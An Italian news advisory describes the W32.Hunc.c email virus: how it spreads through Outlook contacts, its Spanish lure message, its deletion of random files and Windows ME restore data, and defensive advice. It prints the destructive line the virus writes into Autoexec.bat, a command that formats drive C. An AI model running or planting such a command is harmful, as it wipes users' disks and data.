Già molto diffuso, distrugge totalmente i file su disco
Scoperto il 15 aprile e denominato tecnicamente W32.Hunc.c, è un virus di posta elettronica che modifica il file Autoexec.bat, usato durante l’avviamento del sistema operativo Windows, per inserire un comando di formattazione automatica del drive C. Si tratta perciò di un virus estremamente pericoloso per i nostri dati, dato che dopo la formattazione risulta quasi sempre impossibile recuperare sistema operativo e dati.
Il virus però non si ferma qui, perché se il comando di formattazione funziona soltanto al primo riavvio dopo l’infezione, e solo su sistemi Windows 95, 98 e Me (2000, Nt e XP non usano il file Autoexec.bat), cancella cinque file di dati scegliendoli casualmente dal disco fisso, scegliendoli tra quelli dotati di sedici comuni suffissi (Ico, Doc, Xls, Htm, Jpg, Dbf e altri).
Inoltre, cancella i file usati dal sistema operativo Windows ME per ripristinare le condizioni del sistema dopo modifiche o cancellazioni accidentali. In questo modo, anche se si interrompe subito la formattazione del disco al riavvio, non sarà possibile usare il programma Ripristino Configurazione di Sistema per tentare di recuperare i dati persi.
Hunch è già fortemente diffuso: arriva con un messaggio di posta elettronica il cui soggetto è il nome di un file di programma senza estensione e l’allegato è il file del virus, lungo 73728 bytes. Il testo del messaggio è di solito il seguente:
Tal como te prometi; te invio mi foto en el archivio adjuncto…
Mentre il nome dell’allegato è variabile, il che non lo rende immediatamente riconoscibile dai software antivirus che non siano stati aggiornati con le maschere di riconoscimento specifiche per questo virus.
Dato che si spedisce in modo automatico usando i nominativi trovati nella Rubrica di Outlook, arriva spesso da persone conosciute o da colleghi che hanno il nostro indirizzo e-mail tra i contatti del noto programma di posta elettronica di Microsoft.
La riga inserita nel file Autoexec.bat è la sequente:
DEL > Format C: /U /v:THD16 /autotest
Che, come detto, verrà eseguita solo dai sistemi operativi Windows 95, 98 e Me.
Come sempre, per evitare questo virus è necessario non eseguire mai programmi o file con macro allegati ai documenti, anche se arrivano da mittenti conosciuti, diffidando in particolar modo quando il messaggio è vuoto o in una lingua non usata comunemente dal nostro corrispondente. Il virus è intercettato e disattivato dagli antivirus commerciali aggiornati dopo il 15 aprile.
